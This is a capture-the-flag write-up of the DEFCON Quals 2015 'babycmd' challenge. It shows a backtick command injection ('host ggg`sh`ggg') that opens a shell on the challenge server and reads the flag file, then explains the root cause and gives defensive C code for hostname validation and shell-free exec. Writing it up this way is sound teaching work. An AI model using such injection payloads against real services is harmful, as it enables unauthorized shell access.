choppers

DEFCON Quals 2015: babycmd

2015-05-17 00:00:00

Description

Baby's First: 1 point
babycmd

babycmd_3ad28b10e8ab283d7df81795075f600b.quals.shallweplayaga.me:15491
[Download](http://downloads.notmalware.ru/babycmd_3ad28b10e8ab283d7df81795075f600b)

Analysis

$ md5sum babycmd
3ad28b10e8ab283d7df81795075f600b  babycmd
$ file babycmd
babycmd: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, stripped
$ execstack babycmd
- babycmd
$ ./babycmd

Welcome to another Baby's First Challenge!
Commands: ping, dig, host, exit
:

babycmd has three commands: ping, dig, and host. All of them are run through popen(), so we just have to find one whose argument filtering lets a command injection through.

Exploit

The host command lets the "`" character through, which sh (and Bash) uses for command substitution. If we inject sh between backticks we get a shell, but we won't see any of its output until we exit it. The host process then receives sh's output as its argument and echoes it back in an error message.

$ nc babycmd_3ad28b10e8ab283d7df81795075f600b.quals.shallweplayaga.me 15491

Welcome to another Baby's First Challenge!
Commands: ping, dig, host, exit
: host ggg`sh`ggg
cat /home/babycmd/flag
exit
host: 'gggThe flag is: Pretty easy eh!!~ Now let's try something hArd3r, shallwe??ggg' is not in legal name syntax (label too long)
Commands: ping, dig, host, exit
:
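The root cause is that babycmd passes a user-controlled string to popen(), which hands it to /bin/sh, and its filter for host does not reject the backtick. The fix is to validate the argument against the hostname grammar and exec the tool with an argv array so no shell is involved. Added C example, not babycmd's code; is_safe_hostname() and run_host() are hypothetical names:

```c
#include <ctype.h>
#include <stdbool.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Whitelist check for a DNS name: only letters, digits, '-' and '.',
 * each label 1..63 characters, total length at most 253. Anything else,
 * including the '`' that babycmd lets through, is rejected. */
bool is_safe_hostname(const char *s)
{
    size_t len = strlen(s), label = 0;
    if (len == 0 || len > 253)
        return false;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (c == '.') {
            if (label == 0)          /* empty label, e.g. "a..b" or ".a" */
                return false;
            label = 0;
            continue;
        }
        if (!(isalnum(c) || c == '-'))
            return false;
        if (++label > 63)            /* the "label too long" case */
            return false;
    }
    return true;
}

/* Run "host <name>" without a shell. The argv array goes straight to
 * execvp(), so there is no word splitting or command substitution.
 * Returns the child's exit status, or -1 if validation, fork() or
 * waitpid() fails (exec failure surfaces as status 127). */
int run_host(const char *name)
{
    if (!is_safe_hostname(name))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)"host", (char *)name, NULL };
        execvp(argv[0], argv);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```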